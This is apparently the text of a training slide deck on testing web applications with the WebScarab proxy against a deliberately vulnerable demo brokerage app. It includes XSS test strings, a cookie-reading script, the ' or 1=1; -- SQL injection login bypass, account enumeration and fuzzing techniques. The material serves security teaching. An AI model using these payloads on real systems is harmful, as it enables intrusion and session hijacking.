Agenda
� What is a proxy?
� Setting up your environment
� Pre-login tests
� Post-login tests
� Conclusion
A man in the middle proxy
� The proxy sits between the client and the server
� Here we can modify all requests and replies to and from the
server
Advantages
� More powerful than ‘save-n-edit’ attacks
– Proxies are effective on AJAX sites
� We receive requests after the browser completes
JavaScript routines and validation
� Transparent to both the client and server
WebScarab
� WebScarab is an OpenSource proxy provided by
OWASP
� http://www.owasp.org/index.php/Category:OWASP_
Project
� Written in Java with Swing interface
Sample Application: Broken Brokerage
� Demo application written in Java with several
common classes of vulnerabilities
� Simulates a brokerage service with stock trading
Test: Account Enumeration
� Check if it is possible to enumerate valid account
names using the system
– Login error messages
– Forgotten password pages
Attempt valid logins
� Try a login that does exist
– Any login you know is valid
– Admin/Administrator
– Test
Check for differences
� Any difference between error messages is enough
to enumerate logins.
– Even a missing period!
� Password recovery tools often tell if the username is
known
Test: Input validation
� Check to ensure input validation checks are taking
place on the server
� Use meta characters
– < > ( ‘ “ ;
� Common test string
– <script>alert(“XSS”);</script>
What to look for
� Note the Admin username we inserted is not in a
quoted section
– If it were we might have to close the quotes in our
string.
– For example: “<script>alert(“XSS”);</script>
Cross-site Scripting explained
� Phishing attacks often use the ability to inject code
into a web page.
� A cookie can represent a logged in session
� If we can send the cookie to another site then we
can hijack a session
How to test
� Edit the request before it is sent to the server
� Add in a string with JavaScript as a test
Stealing the cookie
� <script>alert(document.coo
kie);</script>
� An attacker could send this
cookie to another server as
an image name
Test: SQL Injection
� It may be possible to inject code that will run on the
database SQL Interpreter
� Classic example
– ‘or 1=1; --
The result
� The results show the attacker has been logged in
without a valid password
� This attack will often result in the attacker being
logged in as the first user in the DB, which is
commonly the admin account
Spider the site
� Look for functionality that shouldn’t be exposed
– Admin pages
– Default content for the web server
Analyze cookies
� Collect large number of tokens (>1k)
� Visually analyze for patterns
� Will likely yield results against homebrew tokens
Analysis of JSESSIONID
� The Java framework provides JSESSIONID
� There are no patterns to be found in this case
Exploit hidden variables
� Programmers may store sensitive data in hidden
variables
� WebScarab allows inline editing
Using the fuzzer
� Create a set of fuzz strings
– XSS, Format strings, long strings, unusual characters
� Supply malicious input to program
� Look for interesting errors or system crashes
Create fuzz strings
� Create a file of strings that could cause issues
� Here we create a simple test of 200 A’s